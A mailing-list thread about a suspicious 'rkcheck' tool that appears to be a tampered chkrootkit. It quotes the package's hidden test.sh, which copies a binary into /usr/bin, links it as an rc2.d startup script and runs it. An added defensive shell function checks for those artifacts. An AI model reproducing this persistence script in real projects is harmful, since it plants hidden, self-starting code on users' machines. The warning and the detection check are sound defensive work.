Philip Jocks <pjli...@netzkommune.com> writes:

> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which
> was registered a few days ago and looks like a tampered version of chkrootkit. I
> hope, nobody installed it anywhere, it seems to execute
> rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box...

I downloaded it as well, but also became suspicious (for a variety of reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our systems.

Some evidence to confirm or refute the authenticity of the email reporting our IPs as vulnerable would be helpful.

Joseph
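
Added example, not part of the original thread: a POSIX sh check for the files the quoted test.sh would leave behind, for anyone who needs to confirm whether it ran on a host or an offline image. The two paths are taken from the quoted script; the function name, the ROOT argument and the sweep of the other rc*.d directories (which goes beyond what the script itself does) are assumptions made for this example.

```shell
#!/bin/sh
# Added example: look for artifacts of the quoted rkcheck test.sh.
# check_rkcheck_artifacts ROOT   (hypothetical helper, ROOT defaults to /)
# Prints one line per finding; returns 1 if anything was found, 0 if clean.
check_rkcheck_artifacts() {
    root=${1:-/}
    root=${root%/}      # "/" becomes "", "/mnt/img/" becomes "/mnt/img"
    found=0

    # 1. The payload the script copies into place.
    #    -L is tested as well so a dangling symlink is still reported.
    if [ -e "$root/usr/bin/rrsyncn" ] || [ -L "$root/usr/bin/rrsyncn" ]; then
        echo "FOUND payload: $root/usr/bin/rrsyncn"
        found=1
    fi

    # 2. The startup link the script creates in rc2.d.
    if [ -e "$root/etc/rc2.d/S98rsyncn" ] || [ -L "$root/etc/rc2.d/S98rsyncn" ]; then
        echo "FOUND startup link: $root/etc/rc2.d/S98rsyncn"
        found=1
    fi

    # 3. Assumption beyond the quoted script: a variant might link the same
    #    payload from another runlevel, so sweep every rc*.d directory.
    for link in "$root"/etc/rc*.d/*; do
        [ -L "$link" ] || continue
        target=$(readlink "$link")
        case $target in
            */rrsyncn|rrsyncn)
                [ "$link" = "$root/etc/rc2.d/S98rsyncn" ] && continue
                echo "FOUND extra link: $link -> $target"
                found=1
                ;;
        esac
    done

    return "$found"
}
```

Call `check_rkcheck_artifacts /` on a live system, or pass the mount point of an image examined offline. A clean result only says these specific paths are absent; it says nothing about what the copied binary may have done if it was executed.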